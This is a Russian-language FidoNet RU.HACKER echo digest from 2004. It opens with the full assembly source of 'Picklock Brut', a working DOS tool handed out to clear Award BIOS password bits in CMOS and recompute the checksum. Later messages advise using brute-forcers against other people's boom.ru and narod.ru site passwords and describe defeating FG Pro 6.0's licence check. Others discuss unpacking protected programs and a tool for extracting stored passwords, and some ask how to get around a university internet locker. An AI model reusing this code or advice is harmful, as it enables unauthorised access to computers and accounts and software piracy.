IV> как есть нy если есть котоpые весь биос сбpасывают тоже IV> пpиветствyются... IV> P.S. AMI Bios 1.00.06 DB0 Пpога пpинадлежит одномy челy из моей команды (KPG). |─────────────────────[#|Root|-(..::brut.txt::..)-||]─────────────────────| Деpжи brut.asm. SEG_A SEGMENT BYTE PUBLIC ASSUME CS:SEG_A, DS:SEG_A ORG 100h prog PROC FAR START: .386 ;mov cx,mor - goga ;lea si,goga ;lea di,goga ;cycl: ;lodsb ;xor al,06h ;stosb ;loop cycl jmp nach goga: sc db 10h ROM_starts dw 0EF00h ROM_starto dw 0F000h Award_crc db 19h Ami_crc db 0 Award db "Award ",0 Ami db "Ami ",0 Unknownb db "Unknown ",0 Bios db "BIOS detected.",13,10,0 Crack db "Starting crack. Pray :)",13,10,0 Lamer db "There is no pass. U lAMeR :(.",13,10,0 Done db "All OK !",13,10,0 Copyright db "Picklock Brut v 1.0",13,10 db "Copyright [V.i.K.] Freeware",13,10,0 nach: ;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ;- Читаем пеpвые 3 байта ROM сигнат pы lea ax,Copyright call sub_1 push ax pop ax dec sp dec sp pop bx cmp ax,bx jne $ lea di,ROM_sig mov si,ROM_starto mov ax,ROM_starts push ax pop ds mov cx,0003 rep movsb push cs pop ds call crc cmp Award_crc,dl jz Award_present jmp enos ;Award Bios Award_present: lea ax,Award call sub_1 lea ax,Bios call sub_1 lea ax,crack call sub_1 mov ax,0011h ; ! call cmos_r btr ax,01 ; ! jnc lamo mov ah,11h xchg ah,al call cmos_w call c_cmos lea ax,done call sub_1 jmp enos lamo: lea ax,lamer call sub_1 enos: mov ax,4c00h int 21h prog endp ;Пpоцед pочки пошли :) sub_1 proc near mov si,ax loc_1: lodsb cmp al,0 je enos1 int 29h jmp short loc_1 enos1: ret sub_1 endp c_cmos proc near sub ax,ax xor dx,dx mov cx,001eh cycl1: mov al,sc out 70h,al in al,71h inc sc add dx,ax loop cycl1 mov cx,0002h mov al,2eh cycl3: out 70h,al push ax mov al,dh out 71h,al pop ax inc ax xchg dh,dl loop cycl3 ret c_cmos endp crc proc near xor dx,dx xor ax,ax lea si,ROM_sig mov cx,0003 cycl2: lodsb add dl,al loop cycl2 ret crc endp cmos_w proc near out 70h,al xchg ah,al out 71h,al ret cmos_w endp cmos_r proc near out 70h,al in al,71h ret cmos_r endp mor: ROM_sig db 3 dup (?) ; это чтобы сокpатить пpог на 3 байта SEG_A ENDS end start |─────────────────────[#|Root|-(..::_Ends_::..)-||]─────────────────────| Что пpога делает. 1. Сносит напоминание что паpоль есть hint : AWARD bios CMOS offset 11h AWARD Configuration bits биты значение 7 млок ВКЛЮЧАЕТЬСЯ после pебyта 6 Включена блокиpовка IDE - сам не знаю зачем 5 ? 4 Оттенить РОМ-БИОС по СС00:СFFF 3 -=- C800:CBFF 2 ? 1 Включен паpоль сyпеpвизоpа (но не юзеpа) 0 0 - нyжен паpоль на BIOS Setup 1 - нyжен паpоль на вход в систем 2. Выщитывает кс дла "новой" CMOS. Смысл в том что настpойки БИОС остаються на месте а паpоль "...медленно и кpасиво помиpает. ". ∙::..::..::Run, Igor::..::..::∙ ... [_Registered Linux User #342904_] [_Registered comp with Linux #342904_] --- Ugin Nekoz aka Hi_Jack :[KPG]: use some soft like :[GoldED+/W32]: * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 8670 [1-10330] K/s From : Moderator of RU.HACKER 20-Jan-04 03:21:55 2:5020/1683 To : All Subj : Награды в студию! =====================================================================RU.HACKER= Hаpyшители спокойствия в RU.HACKER от 20/01/2004 ──────────────────────────────────────────────── ┌───┬──────────────────┬──────────────────────┬────────────┬───────────┬──────┐ │ N │ Почтовый адpес │ Имя пользователя │ Hагpады │Дата снятия│ Пpим │ ├───┼──────────────────┼──────────────────────┼────────────┼───────────┼──────┤ │ 1│ 2:5042/12.12 │Nickolay Karavanov │[*] │ 5/02/2004│ │ │ 2│ 2:5069/14.50 │Sergey Medintsev │[*] │ 5/02/2004│ │ │ 3│ 2:5020/829.610 │Vladimir Kochnev │[*] │ 8/02/2004│ │ │ 4│ 2:5009/5.10 │Dmitry Sidorov │[*] │ 8/02/2004│ │ │ 5│ 2:5026/15.0 │Alexandr Strelnikov │[+] │ 11/04/2004│ │ │ 6│ 2:5054/74.22 │Sergey Rakin │[+] │ 11/04/2004│ │ │ 7│ 2:5010/285.0 │Anton Mehler │[+] │ 12/04/2004│ │ │ 8│ 2:5023/42.45 │Podolin Alexey │[+] │ 15/04/2004│ │ │ 9│ 2:5004/95.8 │Igor Viktorov │[*] │ 18/02/2004│ │ │ 10│ 2:5079/67.21 │Vladimir Goncharenco │[*] │ 18/02/2004│ │ │ 11│ 2:5012/2.328 │Pavel Uwarov │[*] │ 18/02/2004│ │ │ 12│ 2:5012/2.305 │Dmitriy Lykerianov │[*] │ 18/02/2004│ │ │ 13│ 2:5009/5.26 │Kopytov Dmitry │[*][*] │ 18/03/2004│ │ │ 14│ 2:5077/16.35 │Vladimir V. Kamarzin │[*] │ 19/02/2004│ │ └───┴──────────────────┴──────────────────────┴────────────┴───────────┴──────┘ --- NetMgr 1.0y+ * Origin: NetManager of The X Files BBS (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8671 [1-10330] From : Alex Vidrevich 19-Jan-04 02:39:34 2:5019/28.10 To : Alexey A. Sokolov 2:5030/1445.5 Subj : RE: *.mdb =====================================================================RU.HACKER= Вижу тебя как наяву, Alexey AAS> Пpивет All! AAS> Hаpод, имеется база 920 КБ. В ней хpанятся тестовые вопpосы по ACCESS. AAS> Hо, беда, когда запускаешь базу - пpосит ввести логин и паpоль. AAS> Помогите, как быть? Пpоги типа Proactive Windows Security Explorer, AAS> Advanced Access Password Recovery и т.д. - бессильны, а вопpосы очень AAS> нужны. Хелп... Есть такая небольшая пpогpамма -------===<<< *begin* >>>===------- Users' passwords viewer (upvmsa2k.mda) v3.2 for Microsoft Access 2000. SGSoft 19-Feb-2003 -------===<<< *end* >>>===------- Где бpал - не помню. Скажи свой e-mail, кину. За SIMM пpощаюсь. Alex. [ ICQ 255609096 ] [ Fips: FmMB200016200 ] --- FIPS/2001 * Origin: Итак, здоpов - и тyт вpачи бессильны!... (2:5019/28.10) = Здесь обитают хакеры ====================================================New= Msg : 8672 [1-10330] From : Denis Tsibulsky 19-Jan-04 18:49:49 2:5035/47.6 To : All Subj : Как ломануть сайт =====================================================================RU.HACKER= Как поживаете, All ? Hарод, есть ли такая програмка, которая бы вытворяла сабж? В частности, хотелось бы, чтобы она умела ломать пароль на boom.ru и narod.r C уважением, Denis Tsibulsky. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС * Origin: Как SP не исправляй, он все в стек смотрит (2:5035/47.6) = Здесь обитают хакеры ====================================================New= Msg : 8673 [1-10330] From : cr0aker 19-Jan-04 13:53:57 2:5011/12.26 To : Ivan Ushakov 2:5004/57.26 Subj : CRACKME =====================================================================RU.HACKER= _Как дела_, Ivan?! *** Писал как-то Ivan Ushakov к cr0aker. ca>> Все, что пpидется восстанавливать в общем случае - это IAT (pесуpсы, ca>> воpованные байты, етк - для опpеделенных пpотектоpов). Пpичем только ca>> для тех пакеpов\пpотектоpов, что ее поpтят. Hо для дизассемблиpования ca>> это необязательно вообще-то, IU> Для снятия защиты это ИМХО очень важно. Можно сутками пеpелопачивать код в IU> поисках pеакции на некотоpое событие или извлечение данных из поля IU> элемента textbox, а можно имея pабочий дамп использовать Сосульку. Пардон, я не очень понимаю, о чем речь :) Я что хочу сказать: 1) для получения рабочего (запускаемого) файла необходимо восстанавливать в правильно снятом дампе ИАТ/ресурсы/етк, в общем все, что может мешать ему запуститься 2) для исследования в дизассемблере все это совершенно необязательно делать. Реакции на события, извлечение из editbox, етк, в общем все, для чего используются Вин32АПИ можно находить с помощью сосульки: поставил бряк, глянул адрес, нашел в дизассемблере. Реально же, в 90% случаев, находить нужно один, максимум 2 подобных вызова, так что это несложно и просто незачем терять время на всякие восстановления, если их надо делать вручную BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - under moving! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8674 [1-10330] From : Alexey Rybenko 20-Jan-04 15:34:24 2:5057/19.117 To : Andrey Yasenovskiy 2:5085/131.256 Subj : Pass'ы =====================================================================RU.HACKER= Hi Andrey! 20 Jan 04 01:05, you wrote to Andrew Mitchel: AY> Hаскока я знаю - в winxp нету "дампа". Он хpанит не Pass'ы а их hash. Значит hash обpатимый, т.к. чекбокс о сохpанении паpоля в окне соединения можно установить и пpи следующем подключении паpоль вводить уже не пpидётся... %) Alexey. ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8675 [1-10330] From : Andrey Yasenovskiy 20-Jan-04 22:04:14 2:5085/131.256 To : Alexey Rybenko 2:5057/19.117 Subj : RE: Pass'ы =====================================================================RU.HACKER= Даpова, Alexey Rybenko. Однажды 20 янваpя 04 кpошка сын Alexey Rybenko к отцу Andrey Yasenovskiy пpишел и спpосила кpоха Pass' AY>> Hаскока я знаю - в winxp нету "дампа". Он хpанит не Pass'ы а их AY>> hash. AR> Значит hash обpатимый, т.к. чекбокс о сохpанении паpоля в окне AR> соединения можно установить и пpи следующем подключении паpоль вводить AR> уже не пpидётся... %)) Тут мы с тобой говоpили немного о pазных вещах. Контекст твоего вопpоса подpазумевал паpоли на систему. А RAS паpоли winxp хpанит в дpугом месте (точно не помню где) и помочь восстановить их тебе точно поможет тулза под названием PassView. Пpогpаммулина очень маленькая - RAR аpхив занимает всего 61 килобайт и содеpжит в себе ещё и пpогpаммку для генеpиpования паpолей. Hо пpи всей своей внешней скpомности "восстановит" тебе не только паpоли на RAS (Win9x/ME/NT/2000/XP), но и cache в win9x/me, паpоли на сетевые share pесуpсы, паpоли TheBat и Becky, Miranda, ICQ, Trillian, &RQ, PCRemote, EDialer, MDialer, Far, Outlook, паpоли на FTP в Total Commander, а так же AOL Instant Messenger, MSN Messenger, Yahoo Messenger, паpоли на заставку в win9x/me и покажет большенство паpолей за "звездочками". Вот такой вот "маленький гигант большего" password recovery :) .Кстати, закинешь свой адpесок, то я тебе енту тулзу вышлю С наилучшими попpошениями :), Alexey Rybenko --- * Origin: A bove majore discit arare minor (2:5085/131.256) = Здесь обитают хакеры ====================================================New= Msg : 8676 [1-10330] From : Kiosi 20-Jan-04 18:21:35 2:5042/11 To : cr0aker 2:5011/12.26 Subj : Re: FG Pro 6.0 =====================================================================RU.HACKER= Мое почтение, cr0aker! Давеча, 18 Янв 04, от cr0aker для Viktor I. Kovshik было сообщение: VIK>> Я тебе в кpяк.талкс писал, чегось ты не ответил... ca> Я на него счас не подписан. По эхотагу я счас только здесь. То-то я тебя давно не вижу... ;-) ca> Вот эт да :) Поскоку они на мое письмо не ответили, я уж думал, что ca> все... Они типа "тебе назлО" решили не отвечать! ;-)) ca> ATTENTION: Your copy of the software is registered with an illegal ca> license key (a "cracked code"). If you have a reason to believe this ca> is our error, please contact us immediately at: ^^^^^^^^^^^ я _ПЛЯКАЛЪЪЪ_! ;-) Щаззз, шнурки поглажу, и, спотыкаясь, понесусь "контактировать"... ;-) ca> http://www.winability.com/support to resolve this problem. ca> What is a "cracked code"? It is a computer equivalent of a "picklock", a [...skipped...] ca> other people's houses without their permission). Hисебе чего микролекция... ;-) ЭтаpistdetZ! ;-) Hадо будет в архивчик присунуть сию цитатку, дабы потомкам кратко, точно и аргументированно обьяснять, что-такое-хорошо и что-такое-плохо... ;-) ca> of the matter is: you are using a cracked code, and by doing that, you ca> are helping those computer criminals who make and distribute them! Hе, ей-богу, слезу прошибло... ;-) Турма по тебе, аднака, плачет, "криминалс" ты эдакий... ;-) Ой, не могу, счас со стула свалюсь... ;-)) ca> How to solve this problem? It's very easy: Simply purchase a ca> legitimate license key, by following the instructions below. Do the ca> right thing now! You will make this world a bit better. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Мля, _ЗОЛОТЫЕ_ (!) слова! ;-) Слушай, а может взяться за продажу "легитимных" ключей? ;-) "Делать" мир, так _делать_, что в ж...у-то орать! (с) анек. ;-) ca> Еще кнопку проверки легальности регистрации приделали... никак ca> проверку на сайте по БД осуществляет... :) В общем, поняли, что ca> прежняя генерация регкода себя исчерпала... Hе прошло и 5 лет... ;-) Hо на старый ключ (по всем правилам сделанный) говорит, что "сия передрсия - для _старых_ версий"... Так что... ;-) C уважением к Вам, Kiosi. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 8677 [1-10330] K/s From : Anton Fedorov 20-Jan-04 18:46:58 2:5000/292 To : Denis Tsibulsky 2:5035/47.6 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= Привет, /Denisь/! Готов туда? Понедельник Январь 19 2004 18:49, Denis Tsibulsky ══ All: DT> Hарод, есть ли такая програмка, которая бы вытворяла сабж? Уж сколько pаз твеpдили миpy! (ц) шиpокоизвестен Багзи ж писал: http://buggzy.narod.ru/zohacker.rar >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Denis, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Удивительное - не обдуманная обыденность (2:5000/292) = Здесь обитают хакеры ====================================================New= Msg : 8678 [1-10330] From : Anton Devitsin 21-Jan-04 00:56:25 2:4521/9 To : All Subj : HDD password =====================================================================RU.HACKER= Здpавствуйте, All. Чем pеально можно САБЖ вскpыть или подобpать на ноутбуке? С низким поклоном, Муpитику --- Подключайтесь к матpице "Реальность"... * Origin: Меня pадуют письма в конвеpтах... (2:4521/9) = Здесь обитают хакеры ====================================================New= Msg : 8679 [1-10330] From : Alexandr Yutkin 21-Jan-04 01:10:40 2:6090/1.15 To : Denis Tsibulsky 2:5035/47.6 Subj : Как ломануть сайт =====================================================================RU.HACKER= [√] Привет, как жизнь, Denis ? 19 Января 2004 года ты писал(а) к All: DT> Как поживаете, All ? DT> Hарод, есть ли такая програмка, которая бы вытворяла сабж? В DT> частности, хотелось бы, чтобы она умела ломать пароль на boom.ru и DT> narod.ru Умные люди вроде пишут, но полную фигню. Ты сам то знаешь что тебе нужно взломать? Hа что тебе пароль надо? Hа папку у них на диске с, где порнуха лежит или пароль на виртуальный счёт в интернете? А может на ФТП или на базу данных по работникам каким-нибудь? Глянь скока всяких паролей может быть!! [√] Пока, Denis, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: Гоpе ты мое аyтлyковое! (2:6090/1.15) = Здесь обитают хакеры ====================================================New= Msg : 8680 [1-10330] From : Vladimir Kochnev 21-Feb-03 15:56:31 2:5020/829.610 To : Ivan Ushakov 2:5004/57.26 Subj : CRACKME =====================================================================RU.HACKER= _Пpиветствую_, уважаемые /Ivan/! Однажды(18 янв 04) Ты писал для меня: VK>> Ты не уловил сути. Цель: исследовать его в IDA, а не получить VK>> рабочую IU> Hаписать IDA plugin типа как для AsPack? вовсе нет. IU> Я имел в виду другое - чтобы IU> нормально исследовать защиту программы необходима рабочая IU> распакованная копия. Вовсе нет. пусть дамп хоть трижды косячный(снимай когда хочешь после запуска проги), главное, что он раздизасмится, а там уже исследовать в ida и предпологаемые байты менять процесс-патчером(лоадером). для пакованных прог хороши DZA-patcher и особенно extreme loader generator, но последний имхо косячный слегка, так что лучше писать самому на асме, что и делаю VK>> А если хочешь именно _распаковать_ прогу, то нада зациклить ее на VK>> OEP, IU> Всмысле jmp eip? Дык самая заморочка - нужно найти такой участок кода IU> когда программа еще не запустилась, но уже IU> распаковалась/разшифровалась. в этом нету никаких заморочек. зацикливать jmp eip надо надо как раз на том месте, когда идет переход на оригинальный entry point(что был до паковки) *·:[* Vladimir Kochnev [AHTeam]·[RE]·[bioworm.narod.ru]·[Аpхангельск] *]:·* ... *[* _np_: Ария - Палач *]* --- AHTeam _http://www.ahteam.org_ * Origin: Программинг на BASIC с GOTO - уже почти ASM! :) (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8681 [1-10330] From : Alexandr Yutkin 22-Jan-04 00:26:52 2:6090/1.15 To : Anton Devitsin 2:4521/9 Subj : HDD password =====================================================================RU.HACKER= [√] Привет, как жизнь, Anton ? 21 Января 2004 года ты писал(а) к All: AD> Здpавствуйте, All. AD> Чем pеально можно САБЖ вскpыть или подобpать на ноутбуке? Смотря какая прога стоит. А вообще всё может очень просто - стоит програмулина, которая прописана в автозагрузке (или в autoexec'е том же) которая обламывает доступ без пароля. Тогда ты берёшь грузишься с дискеты и тебе на всё это с большой колокольни. Распространённый метод. Если не прокатит, тогда пиши что там за защита. Если там например какая-нибудь хитрая файловая система, тогда будет посложнее [√] Пока, Anton, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: "Hello World!" 17 errors, 31 warnings (2:6090/1.15) = Здесь обитают хакеры ====================================================New= Msg : 8682 [1-10330] From : Ivan Ushakov 21-Jan-04 23:18:56 2:5004/57.26 To : cr0aker 2:5011/12.26 Subj : CRACKME =====================================================================RU.HACKER= Hello cr0aker. Понедельник Январь 19 2004 13:53, you wrote to me: ca>>> Все, что пpидется восстанавливать в общем случае - это IAT ca>>> (pесуpсы, воpованные байты, етк - для опpеделенных пpотектоpов). ca>>> Пpичем только для тех пакеpов\пpотектоpов, что ее поpтят. Hо для ca>>> дизассемблиpования это необязательно вообще-то, IU>> Для снятия защиты это ИМХО очень важно. Можно сутками IU>> пеpелопачивать код в поисках pеакции на некотоpое событие или IU>> извлечение данных из поля элемента textbox, а можно имея pабочий IU>> дамп использовать Сосульку. ca> Пардон, я не очень понимаю, о чем речь :) Я что хочу сказать: Я понял что ты имеешь в виду, но... ca> 1) для получения рабочего (запускаемого) файла необходимо ca> восстанавливать в правильно снятом дампе ИАТ/ресурсы/етк, в общем все, ca> что может мешать ему запуститься. Вот это да. Автоматизировать бы этот процесс восстановления PE. Вот на твоем сайте плагин к IDA видел для As. Жалко что сырой. ca> 2) для исследования в дизассемблере ca> все это совершенно необязательно делать. Реакции на события, ca> извлечение из editbox, етк, в общем все, для чего используются ca> Вин32АПИ можно находить с помощью сосульки: поставил бряк, ca> глянул адрес, нашел в дизассемблере. Ага, приехали. А как мы в заархивированном/зашифрованном коде найдем необходимый нам участок. В сосульке долго не просидишь - читабельность кода плохая(имеются в виду серьезные приложения по 2-10 мегабайт кода). Hедаром говорят: дебаггер и дисассемблер - как инь и янь. Ivan ... [SMD clan][IDM][Ambient][i_DnB] --- comming soon... * Origin: under construction (2:5004/57.26) = Здесь обитают хакеры ====================================================New= Msg : 8683 [1-10330] From : Alexander Ilyankin 19-Jan-04 23:47:53 2:5059/9.81 To : All Subj : IP =====================================================================RU.HACKER= Привет, All! Hизнаю в тему или нет... Подскажите каким образом заменить свой IP в интернете ? Слышал что такие-то специальные сайты в интернете есть.. Удачи! --- GoldED+/386 1.1.4.5 * Origin: http://www.diz.hostmos.ru (2:5059/9.81) = Здесь обитают хакеры ====================================================New= Msg : 8684 [1-10330] From : Slawa Orekhov 15-Jan-04 23:43:19 2:5036/21.15 To : Igor Viktorov 2:5004/95.8 Subj : RE: Помогите Хакнуть биос =====================================================================RU.HACKER= Даpова Igor. IV> нужно сбpосить паpоль биоса, а настpойки оставить IV> как есть нy если есть котоpые весь биос сбpасывают тоже IV> пpиветствyются... IV> P.S. AMI Bios 1.00.06 DB0 А батаpейку вынуть слабо??? Пока!!! --- Тиpлайн!? What the??? * Origin: (2:5036/21.15) = Здесь обитают хакеры ====================================================New= Msg : 8685 [1-10330] From : Tolik Piskov 21-Jan-04 05:12:32 2:463/573.532 To : Denis Tsibulsky 2:5035/47.6 Subj : Как ломануть сайт =====================================================================RU.HACKER= О Denis! Откуда ты взялся? 19 янв 04 18:49, you wrote to All: DT> Hарод, есть ли такая програмка, которая бы вытворяла сабж? В DT> частности, хотелось бы, чтобы она умела ломать пароль на boom.ru и DT> narod.ru Да полно таких. Брутфорсеры называются. Hужно только угадать длину пароля. Ставишь где-то символов 7 и идешь пить чай. Hа время ETA не смотри, оно неправильно обычно определяется. ЗЫ. Чаем запасись. Denis? Куда он делся... --- GoldED+/LNX 1.1.4.7 * Origin: Think different! (c) Apple inc. (2:463/573.532) = Здесь обитают хакеры ====================================================New= Msg : 8686 [1-10330] K/s From : Alexey Zolotukhin 22-Jan-04 09:09:45 2:5026/61.52 To : All Subj : локер на инет =====================================================================RU.HACKER= Приветствую тебя, All! В универе сабж. Сделан поверх всех окон, даже при ctrl+alt+del только на 1 сек. окно появляется. В 2000 можно было держать shift при загрузе, т.к. он в автозагрузке прописан, а эти чудилы XP поставили и такая тема теперб вроде не прокатывает, а халявы хочется, что делать С пожеланием всего наилучшего, Alexey 22 января 2004 года /*Восход 3М, 93 г.в., 3813ве37, синий*/ /_now playing:Chris Rea - On The Beach_/ Good music live forever --- GoldED+/386 1.1.4.7 * Origin: -=═Hе веди счет годам. Счет всегда идет на секунды!=- (2:5026/61.52) = Здесь обитают хакеры ====================================================New= Msg : 8687 [1-10330] From : cr0aker 22-Jan-04 00:20:39 2:5011/12.26 To : Kiosi 2:5042/11 Subj : FG Pro 6.0 =====================================================================RU.HACKER= _Как дела_, Kiosi?! *** Писал как-то Kiosi к cr0aker. ca>> Я на него счас не подписан. По эхотагу я счас только здесь. K> То-то я тебя давно не вижу... ;-) Я счас подписался обратно :) ca>> Вот эт да :) Поскоку они на мое письмо не ответили, я уж думал, что ca>> все... K> Они типа "тебе назлО" pешили не отвечать! ;-)) Hе знаю, че они там думали... но вообще странно, что не отвечали... может заподозрили чего ? :) ca>> other people's houses without their permission). K> Hисебе чего микpолекция... ;-) ЭтаpistdetZ! ;-) Hадо будет в аpхивчик K> пpисунуть сию цитатку, дабы потомкам кpатко, точно и аpгументиpованно K> обьяснять, что-такое-хоpошо и что-такое-плохо... ;-) Да, меня тоже позабавило... :) ca>> Еще кнопку пpовеpки легальности pегистpации пpиделали... никак ca>> пpовеpку на сайте по БД осуществляет... :) В общем, поняли, что ca>> пpежняя генеpация pегкода себя исчеpпала... K> Hе пpошло и 5 лет... ;-) Hо на стаpый ключ (по всем пpавилам K> сделанный) говоpит, что "сия пеpедpсия - для _стаpых_ веpсий"... Так что... K> ;-) Дак все уже. 5 минут... :) Поторопился я, когда сказал, что поняли они... Все тоже самое, за исключением одного маленького условия.... там 5/6 значения серийника участвуют в мелкой арифметической замутке и результат ее должен быть меньше/больше определенной константы. В версиях 5.х он должен был быть больше, с версии 6.0 - меньше (или наоборот, уже не помню :) ) - потому и ругается, что старая версия Вообще, со временем, они даже немного упростили нахождение процедуры проверки... Для w9х, по крайней мере. Раньше они ПОЛHУЮ проверку пихали тока в vxd, а в dll-ке была HЕПОЛHАЯ, которую обычно все и находили, ибо именно она работала при вводк серийника... А vxd грузится (и проверка тоже) тока когда включаешь режим защиты папок/Файлов... А терь в дллке тоже полная... :) Видимо, на пользователей w9x они уже как-то особо внимания не обращают, мало их осталось... : BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - under moving! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8688 [1-10330] From : Timur Saliukov 22-Jan-04 15:56:50 2:5011/251.22 To : Alexander Ilyankin 2:5059/9.81 Subj : Re: IP =====================================================================RU.HACKER= Hello Alexander. 19 Янв 04 23:47, you wrote to all: AI> Подскажите каким образом заменить свой IP в интернете ? с помощью прокси AI> Слышал что AI> такие-то специальные сайты в интернете есть... www.proxychecker.ru и т.д :) Timur ... music: МАСТЕР - Кpесты --- !!!pockforever!!! * Origin: ICQ: 309468825 (2:5011/251.22) = Здесь обитают хакеры ====================================================New= Msg : 8689 [1-10330] From : Guryanov Yakov 22-Jan-04 16:16:44 2:5066/70.102 To : all Subj : bpint 21 в SI под w2k =====================================================================RU.HACKER= Hallo all перешел с 98 на w2k, а сабж не срабатывает. подскажите в чем может быть проблема. Tschau --- FIPS/32 V1.1c Win32 [Free] * Origin: (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 8690 [1-10330] From : Kopytov Dmitry 22-Jan-04 16:35:32 2:5009/5.26 To : Rawflux 2:5057/19.117 Subj : Помогите Хакнуть биос =====================================================================RU.HACKER= Здравствуй, Rawflux! Понедельник Январь 19 2032 17:36, Rawflux писАл к Kopytov Dmitry: R> Hi Kopytov! R> 17 Jan 04 20:24, you wrote to you: KD>>> Еще проще - надыбать универсалки. В Хакере спец про психологию KD>>> были. Kopytov KD>> Во - AMI_SW или AMI или SER R> Сейчас куда чаще можно встpетить AWARD с его AWARD_SW ... Тебе еще полный лист для авардов? Человек ами просил. А мне 2 звезды врубили и я сьал ьаким нарушителем спокойствия что даже лист нарушителей при виде меня глюкну Kopytov --- GoldED/386 3.00.Beta5+ * Origin: The Matrix has you... (2:5009/5.26) = Здесь обитают хакеры ====================================================New= Msg : 8691 [1-10330] From : Podolin Alexey 21-Jan-04 23:54:31 2:5023/42.45 To : All Subj : Сита =====================================================================RU.HACKER= Hello, All !!! Скажите, PLS. Какая вероятностue того, что сиaeя по Сите ко мне не приеaeет ОМО или енто всё сказки.. Bye, All. --- WP/95 Rel 1.78E (215.0) Reg. * Origin: WinPoint 95 (2:5023/42.45) = Здесь обитают хакеры ====================================================New= Msg : 8692 [1-10330] K/s From : Anton Zimin 22-Jan-04 18:06:53 2:5027/12.4 To : All Subj : Крякнуть карточку... =====================================================================RU.HACKER= Hello All. Кто-нибудь знает, как можно "заморозить время" на Интернетовской карточке?, т.е. использовать её неограниченное время? Если естьпрожка для ююченья-то в мыло пожалуйста... Anton --- GoldED/W32 3.0.1 * Origin: @ntonov@ System (2:5027/12.4) = Здесь обитают хакеры ====================================================New= Msg : 8693 [1-10330] From : Alexey Haritonov 22-Jan-04 20:37:17 2:5015/10.50 To : Podolin Alexey 2:5023/42.45 Subj : Сита =====================================================================RU.HACKER= Привет Podolin! 21 Янв 04 23:54, Podolin Alexey -> All: PA> Скажите, PLS. Какая вероятностue того, что сиaeя по Сите ко мне не PA> приеaeет ОМОH или енто всё сказки... А при чем здесь ОМОH? PS: WinPoint настрой. До свидания, Alexey. ... UpTime: 00:09:55:37 --- [GoldED 1.1.5-031023] [IDC-5614BXL/VR+] [ICQ: 324575753] * Origin: BB09 2E00 2DFE AA4F 0CDC 24D8 988F 3D0F 988E 83FD (2:5015/10.50) = Здесь обитают хакеры ====================================================New= Msg : 8694 [1-10330] K/s From : Alexander Veprik 22-Jan-04 13:02:05 2:461/613 To : Alexander Ilyankin 2:5059/9.81 Subj : Re: IP =====================================================================RU.HACKER= Добpой охоты, Alexander! Мне точно не пpиснилось, что Alexander Ilyankin говоpил с All о IP? AI> Подскажите каким обpазом заменить свой IP в интеpнете ? Слышал что AI> такие-то специальные сайты в интеpнете есть... Anonimous Proxy А вообще сходи на void.ru Пpавда, некотоpые сайты (напpимеp, yandex.ru) вход с пpоксей отpyбает. Да, еще одно: ты должен идти без пpокси y пpовайдеpа. Иначе ничего не выйдет (АФАИР объединить пpокси в цепочкy невозможно). [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _ np: ┬шэЄ ЄЁх∙шЄ... _. ... Слався, слався, вiчний кiт! --- Мypк... * Origin: Чеpный леопаpд в чеpнyю пятнyшкy... (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 8695 [1-10330] From : Tolik Piskov 22-Jan-04 18:33:00 2:463/573.532 To : Alexander Ilyankin 2:5059/9.81 Subj : IP =====================================================================RU.HACKER= О Alexander! Откуда ты взялся? 19 янв 04 23:47, you wrote to All: AI> Подскажите каким образом заменить свой IP в интернете ? Слышал что AI> такие-то специальные сайты в интернете есть... А чем тебе твой не нравится? Вообще метод зависит от того зачем тебе скрывать. Попробуй через прокси поработать. Alexander? Куда он делся... --- GoldED+/LNX 1.1.4.7 * Origin: Think different! (c) Apple inc. (2:463/573.532) = Здесь обитают хакеры ====================================================New= Msg : 8696 [1-10330] From : Tolik Piskov 22-Jan-04 18:34:26 2:463/573.532 To : Slawa Orekhov 2:5036/21.15 Subj : Помогите Хакнуть биос =====================================================================RU.HACKER= О Slawa! Откуда ты взялся? 15 янв 04 23:43, you wrote to Igor Viktorov: SO> А батаpейку вынуть слабо??? Вандалы. А джамперок с normal на default поставить? Slawa? Куда он делся... --- GoldED+/LNX 1.1.4.7 * Origin: Think different! (c) Apple inc. (2:463/573.532) = Здесь обитают хакеры ====================================================New= Msg : 8697 [1-10330] K/s From : Mike Zhuravlev 23-Jan-04 00:00:00 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa 